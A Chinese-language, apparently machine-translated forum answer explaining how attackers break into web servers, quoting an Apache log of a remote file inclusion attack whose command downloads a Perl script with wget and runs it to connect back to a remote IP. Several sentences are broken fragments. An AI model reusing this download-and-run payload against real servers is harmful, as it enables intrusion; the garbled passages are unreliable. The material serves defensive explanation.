漏洞利用的本质就是试图不被发现。因此,大多数漏洞利用不会通过正常方式进入系统,至少最初不会。他们通常会使用缓冲区溢出之类的方法来获取对系统的访问权限。
这种类型的攻击会寻找应用程序中希望获取用户输入的部分。考虑一个网页和各种文本框,您必须通过在这些文本框中键入内容来提供信息。每个文本框都是潜在攻击者的潜在入口点。
大多数系统都被设计为不允许 root 登录,因此这种攻击媒介并不是真正的问题。大多数攻击都会获得对其他较低级别帐户的访问权限,然后在您的系统上建立滩头阵地后通过发现其他漏洞来利用。
攻击者可以通过执行以下操作来获得 root 访问权限:
ls。ls以获得对 root 帐户的访问权限。潜在的攻击者甚至可能对完全控制您的系统不感兴趣。大多数入侵者只对收集用作其他用途的“奴隶”的系统感兴趣。通常,攻击者只想将他们的软件安装在您的系统上,以便他们可以使用该系统,而无需完全控制系统。
CMD.gif并上传。例如,可能是论坛网站上用户的头像图像。但这CMD.gif不是图像,它实际上是一个程序,名为CMD.gif。此类攻击的 Web 服务器日志文件
201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
"GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
&cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
%2072.36.21.183%2021 HTTP/1.1" 200
Run Code Online (Sandbox Code Playgroud)
注意:来自 Apache Web 服务器的示例日志由OSSEC.net提供。
在这里,攻击者让 webapp X (index.php) 运行,CMD.gif然后可以执行以下操作:
cd /tmpwget http://72.36.254.26/~fanta/dc.txtperl dc.txt 72.36.21.183 21因此,他们诱使 webapp X 将目录更改为/tmp,下载文件 ,dc.txt然后运行该文件,在端口 21 上连接回 IP 地址 72.36.21.183。
您可以关闭“检测到”漏洞的服务器的想法是一个很好的尝试,但由于几个原因它不起作用。
我可以继续说下去,但一般来说,在保护系统安全方面,您有一些可用的资源。
gcc安装编译器,则不要安装它。